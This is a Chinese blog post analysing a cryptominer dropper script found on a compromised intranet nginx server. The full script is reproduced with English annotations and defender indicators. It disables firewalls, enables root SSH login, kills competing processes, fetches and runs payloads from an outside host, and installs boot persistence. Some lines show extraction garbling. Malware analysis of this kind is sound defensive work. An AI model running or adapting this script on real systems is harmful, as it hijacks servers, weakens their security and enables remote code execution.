日常抓病毒
月常抓病毒水文
这次也是注入,不过都能搞到内网服务器了。
被入侵的服务器是内网的nginx代理服务器,默认文件倒是没有被删除,但跑满了的CPU实在不能忍。
抓到文件,就当是复习shell脚本了,技术不到家,代码容易被攻破啊。
攻击者获取文件地址:xia.beihaixue.com(香港)
#!/bin/bash
#chkconfig: 2345 88 14
# Analyst annotation: this listing is a captured malicious script, reproduced
# as found on the compromised host. It is kept for analysis only; do not run it.
# The "#chkconfig:" header above is the tag chkconfig reads from SysV init
# scripts (runlevels 2345, start priority 88, stop priority 14), which suggests
# this file is meant to be registered as a boot-time service.
# SHELL and PATH are set explicitly, so the script does not rely on the
# environment of whatever launches it.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
function kills() {
# Analyst annotation (code below is unchanged from the captured sample).
# kills() is called on every pass of the loop at the end of the script. It
# rewrites DNS, weakens the firewall and SSH configuration, then terminates
# processes and deletes files by name and by listening port.
# Takes no arguments and returns nothing meaningful.
#
# Host changes to check for and revert during cleanup:
#   - /etc/resolv.conf reduced to "nameserver 8.8.8.8"
#   - "PermitRootLogin yes" appended to /etc/ssh/sshd_config
#   - iptables INPUT ACCEPT rules for TCP 1522, 3307 and 6001
#   - iptables / firewalld stopped, firewalld disabled
#   - package sysv-rc-conf installed
#
# Disabled by the author: would have killed every process above 20% CPU
# whose ps line does not contain "sourplum".
#ps aux |grep -v sourplum | awk '{if($3>20.0) print $2}' | while read procid
#do
#pkill -f $procid
#done
# Drops all existing nameserver lines and forces a single public resolver,
# bypassing whatever internal DNS the host was configured to use.
sed -i '/nameserver*/d' /etc/resolv.conf
echo "nameserver 8.8.8.8" >> /etc/resolv.conf
# needreset is assigned here but never read anywhere in this listing.
needreset=1;
# Inserts ACCEPT rules at the top of INPUT for three TCP ports. What listens
# on them is not shown on the page; treat them as ports to audit.
iptables -I INPUT -p TCP --dport 1522 -j ACCEPT
iptables -I INPUT -p TCP --dport 3307 -j ACCEPT
iptables -I INPUT -p TCP --dport 6001 -j ACCEPT
# Removes any PermitRootLogin setting (commented or not) and appends an
# explicit "yes". No sshd restart or reload appears in this script.
sed -i '/.PermitRootLogin*/d' /etc/ssh/sshd_config
sed -i '/PermitRootLogin*/d' /etc/ssh/sshd_config
echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
# Stops the host firewall through each init system in turn.
/etc/init.d/iptables stop
service iptables stop
# NOTE(review): the next line looks like two SuSEfirewall2 stop commands fused
# together (and re-cased) by the page extraction; as written it is one
# unknown command.
sUsEFirewall2 stopresUsEFirewall2 stop
systemctl stop firewalld.service
systemctl disable firewalld.service
pkill -f sourplum
# "&&" chain: each step runs only if the previous one succeeded. "ddg*" is
# unquoted, so the shell may glob-expand it against the current directory.
pkill wnTKYg && pkill ddg* && rm -rf /tmp/ddg* && rm -rf /tmp/wnTKYg
rm -rf /boot/grub/deamon && rm -rf /boot/grub/disk_genius
rm -rf /tmp/*index_bak*
rm -rf /tmp/*httpd.conf*
rm -rf /tmp/*httpd.conf
rm -rf /tmp/a7b104c270
# Kill-by-name list. "pkill -f" matches the pattern against the full command
# line, so entries such as polkitd, acpid and irqbalance also terminate the
# legitimate system daemons with those names. Terms like minerd, minergate,
# cryptonight and stratum suggest the remaining entries target other miners
# already on the host (not confirmed by the page).
pkill -f AnXqV.yam
pkill -f biosetjenkins
pkill -f Loopback
pkill -f apaceha
pkill -f cryptonight
pkill -f stratum
pkill -f mixnerdx
pkill -f performedl
pkill -f JnKihGjn
pkill -f irqba2anc1
pkill -f irqba5xnc1
pkill -f irqbnc1
pkill -f ir29xc1
pkill -f conns
pkill -f irqbalance
pkill -f crypto-pool
pkill -f minexmr
pkill -f XJnRj
pkill -f NXLAi
pkill -f BI5zj
pkill -f askdljlqw
pkill -f minerd
pkill -f minergate
pkill -f Guard.sh
pkill -f ysaydh
pkill -f bonns
pkill -f donns
pkill -f kxjd
pkill -f Duck.sh
pkill -f bonn.sh
pkill -f conn.sh
pkill -f kworker34
pkill -f kw.sh
pkill -f pro.sh
pkill -f polkitd
pkill -f acpid
pkill -f icb5o
pkill -f nopxi
pkill -f irqbalanc1
pkill -f minerd
pkill -f i586
pkill -f gddr
pkill -f mstxmr
pkill -f ddg.2011
pkill -f wnTKYg
pkill -f deamon
pkill -f disk_genius
pkill -f sourplum
pkill -f my.confe
pkill -f pprt
pkill -f ppol
rm -rf /tmp/httpd.conf
rm -rf /tmp/conn
rm -rf /tmp/conns
rm -f /tmp/irq.sh
rm -f /tmp/irqbalanc1
rm -f /tmp/irq
# For each port below: list processes with a TCP socket on it (lsof), skip the
# header row, and SIGKILL every PID found. Any local service that happens to
# use 9999, 5555, 7777 or 14444 is killed as well.
PORT_NUMBER=9999
lsof -i tcp:${PORT_NUMBER} | awk 'NR!=1 {print $2}' | xargs kill -9
PORT_NUMBER=5555
lsof -i tcp:${PORT_NUMBER} | awk 'NR!=1 {print $2}' | xargs kill -9
PORT_NUMBER=7777
lsof -i tcp:${PORT_NUMBER} | awk 'NR!=1 {print $2}' | xargs kill -9
PORT_NUMBER=14444
lsof -i tcp:${PORT_NUMBER} | awk 'NR!=1 {print $2}' | xargs kill -9
# Installs sysv-rc-conf, the tool downloadyam2() looks for at
# /usr/bin/sysv-rc-conf to register a boot service.
apt-get install -y sysv-rc-conf
}
function downloadyam() {
# Analyst annotation (code below is unchanged from the captured sample).
# Ensures a payload exists at /etc/my.conf and is running.
#   - File missing: fetch it over plain HTTP (curl, then wget, alternating up
#     to four attempts), mark it 0777, and start it detached with nohup.
#   - File present: count processes whose ps line matches "my.conf" and
#     relaunch only when the count is zero.
# Indicators for defenders: an executable, world-writable file at /etc/my.conf
# (presumably named to resemble a config file such as MySQL's /etc/my.cnf),
# a download of a ".png" URL that is then executed, and a process whose
# command line is /etc/my.conf.
# The leading "?" runs on the lines below appear to be extraction residue of
# the page's original indentation; they are left exactly as published.
?? ??? ?if [ ! -f "/etc/my.conf" ]; then
?? ??? ??? ??? ?curl http://xia.beihaixue.com/my.png -o /etc/my.conf && chmod 0777 /etc/my.conf
?? ??? ??? ??? ?
# Each retry below runs only if the previous attempt left no file behind.
?? ??? ??? ??? ?if [ ! -f "/etc/my.conf" ]; then
?? ??? ??? ??? ??? ?wget http://xia.beihaixue.com/my.png -O /etc/my.conf && chmod 0777 /etc/my.conf
# Deletes anything matching /etc/my.conf.* (presumably stray download copies).
?? ??? ??? ??? ??? ?rm -rf /etc/my.conf.*
?? ??? ??? ??? ?fi
?? ??? ??? ??? ?
?? ??? ??? ??? ?if [ ! -f "/etc/my.conf" ]; then
?? ??? ??? ??? ??? ?curl http://xia.beihaixue.com/my.png -o /etc/my.conf && chmod 0777 /etc/my.conf
?? ??? ??? ??? ??? ?rm -rf /etc/my.conf.*
?? ??? ??? ??? ?fi
?? ??? ??? ??? ?if [ ! -f "/etc/my.conf" ]; then
?? ??? ??? ??? ??? ?wget http://xia.beihaixue.com/my.png -O /etc/my.conf && chmod 0777 /etc/my.conf
?? ??? ??? ??? ??? ?rm -rf /etc/my.conf.*
?? ??? ??? ??? ?fi
?? ??? ??? ??? ?#sed -i '1a\nameserver 8.8.8.8\n' /etc/resolv.conf
# Starts the downloaded file in the background, detached from the terminal.
?? ??? ??? ??? ?nohup /etc/my.conf &
?? ??? ?else
# p = number of ps lines containing "my.conf" (excluding the grep itself).
?? ??? ??? ??? ?p=$(ps aux | grep my.conf | grep -v grep | wc -l)
?? ??? ??? ??? ?if [ ${p} -eq 1 ];then
?? ??? ??? ??? ??? ?echo "my.conf"
?? ??? ??? ??? ?elif [ ${p} -eq 0 ];then
# Relaunch with all output discarded. NOTE(review): the "?" before my.conf
# looks like extraction residue rather than part of the original argument.
?? ??? ??? ??? ??? ?nohup /etc/my.conf -P ?my.conf>/dev/null 2>&1 &
?? ??? ??? ??? ?else
?? ??? ??? ??? ??? ?echo ""
?? ??? ??? ??? ?fi
?? ??? ?fi
}
function downloadyam1() {
# Analyst annotation (code below is unchanged from the captured sample).
# Same pattern as downloadyam(), for a second payload at /var/ssh.conf:
#   - File missing: fetch it over plain HTTP (curl/wget alternating, up to
#     four attempts), mark it 0777, and start it detached with nohup.
#   - File present: relaunch only if no process line matches "ssh.conf".
# Indicators for defenders: an executable, world-writable /var/ssh.conf
# (the name presumably chosen to look like an SSH config file) and a process
# whose command line is /var/ssh.conf.
# The leading "?" runs on the lines below appear to be extraction residue of
# the page's original indentation; they are left exactly as published.
?? ??? ?if [ ! -f "/var/ssh.conf" ]; then
?? ??? ??? ??? ?curl http://xia.beihaixue.com/sso.png -o /var/ssh.conf && chmod 0777 /var/ssh.conf
# Each retry below runs only if the previous attempt left no file behind.
?? ??? ??? ??? ?if [ ! -f "/var/ssh.conf" ]; then
?? ??? ??? ??? ??? ?wget http://xia.beihaixue.com/sso.png -O /var/ssh.conf && chmod 0777 /var/ssh.conf
# Deletes anything matching /var/ssh.conf.* (presumably stray download copies).
?? ??? ??? ??? ??? ?rm -rf /var/ssh.conf.*
?? ??? ??? ??? ?fi
?? ??? ??? ??? ?
?? ??? ??? ??? ?if [ ! -f "/var/ssh.conf" ]; then
?? ??? ??? ??? ??? ?curl http://xia.beihaixue.com/sso.png -o /var/ssh.conf && chmod 0777 /var/ssh.conf
?? ??? ??? ??? ??? ?rm -rf /var/ssh.conf.*
?? ??? ??? ??? ?fi
?? ??? ??? ??? ?if [ ! -f "/var/ssh.conf" ]; then
?? ??? ??? ??? ?
?? ??? ??? ??? ??? ?wget http://xia.beihaixue.com/sso.png -O /var/ssh.conf && chmod 0777 /var/ssh.conf
?? ??? ??? ??? ??? ?rm -rf /var/ssh.conf.*
?? ??? ??? ??? ?fi
?? ??? ??? ??? ?
# Starts the downloaded file in the background, detached from the terminal.
?? ??? ??? ??? ?nohup /var/ssh.conf &
?? ??? ?else
# p = number of ps lines containing "ssh.conf" (excluding the grep itself).
?? ??? ??? ??? ?p=$(ps aux | grep ssh.conf | grep -v grep | wc -l)
?? ??? ??? ??? ?if [ ${p} -eq 1 ];then
?? ??? ??? ??? ??? ?echo "ssh.conf"
?? ??? ??? ??? ?elif [ ${p} -eq 0 ];then
# Relaunch with all output discarded.
?? ??? ??? ??? ??? ?nohup /var/ssh.conf -P ssh.conf>/dev/null 2>&1 &
?? ??? ??? ??? ?else
?? ??? ??? ??? ??? ?echo ""
?? ??? ??? ??? ?fi
?? ??? ?fi
}
function downloadyam2() {
# Analyst annotation (code below is unchanged from the captured sample).
# Boot persistence: places a file at /etc/init.d/S67 (fetched over plain HTTP,
# curl/wget alternating, up to four attempts, mode 0777) and registers it as
# a SysV service using whichever tool is present.
# This function is defined but not called by the loop at the end of this
# listing; hosts should still be checked for its artefacts:
#   - /etc/init.d/S67 and any matching rc*.d links
#   - an "S67" entry in chkconfig or sysv-rc-conf listings
# The leading "?" runs on the lines below appear to be extraction residue of
# the page's original indentation; they are left exactly as published.
?? ??? ??? ??? ?if [ ! -f "/etc/init.d/S67" ]; then
?? ??? ??? ??? ??? ?curl http://xia.beihaixue.com/s68.png -o /etc/init.d/S67 && chmod 0777 /etc/init.d/S67
# Deletes anything matching /etc/init.d/S67.* (presumably stray download copies).
?? ??? ??? ??? ??? ?rm -rf /etc/init.d/S67.*
?? ??? ??? ??? ?fi
# Each retry below runs only if the previous attempt left no file behind.
?? ??? ??? ??? ?if [ ! -f "/etc/init.d/S67" ]; then
?? ??? ??? ??? ??? ?wget http://xia.beihaixue.com/s68.png -O /etc/init.d/S67 && chmod 0777 /etc/init.d/S67
?? ??? ??? ??? ??? ?rm -rf /etc/init.d/S67.*
?? ??? ??? ??? ?fi
?? ??? ??? ??? ?
?? ??? ??? ??? ?if [ ! -f "/etc/init.d/S67" ]; then
?? ??? ??? ??? ??? ?curl http://xia.beihaixue.com/s68.png -o /etc/init.d/S67 && chmod 0777 /etc/init.d/S67
?? ??? ??? ??? ??? ?rm -rf /etc/init.d/S67.*
?? ??? ??? ??? ?fi
?? ??? ??? ??? ?if [ ! -f "/etc/init.d/S67" ]; then
?? ??? ??? ??? ??? ?wget http://xia.beihaixue.com/s68.png -O /etc/init.d/S67 && chmod 0777 /etc/init.d/S67
?? ??? ??? ??? ??? ?rm -rf /etc/init.d/S67.*
?? ??? ??? ??? ?fi
?? ??? ??? ??? ?
# The presence of /usr/bin/yum is apparently used as the test for a
# chkconfig-based (RPM-family) system.
?? ??? ??? ??? ?if [ -f "/usr/bin/yum" ]; then
?? ??? ??? ??? ??? ?chkconfig --add S67
?? ??? ??? ??? ??? ?chkconfig S67 on
?? ??? ??? ??? ?fi
# Otherwise falls back to sysv-rc-conf, the package kills() installs via apt-get.
?? ??? ??? ??? ?if [ -f "/usr/bin/sysv-rc-conf" ]; then
?? ??? ??? ??? ??? ?cd /etc/init.d/
?? ??? ??? ??? ??? ?sysv-rc-conf S67 on
?? ??? ??? ??? ?fi
}
# Analyst annotation (code below is unchanged from the captured sample).
# Main loop: "[ 1 ]" is always true, so this never exits. Each pass re-applies
# the host changes in kills(), re-checks the /etc/my.conf payload, waits 20 s,
# re-checks the /var/ssh.conf payload, then sleeps 10 minutes.
# Consequence for cleanup: deleting the payload files or killing their
# processes is undone on the next pass unless this script's own process (and
# whatever starts it at boot) is removed first.
while [ 1 ]
do
?? ?kills
# "check" is commented out and no such function is defined in this listing.
?? ?#check
?? ?downloadyam
?? ?sleep 20
?? ?downloadyam1
?? ?sleep 600
done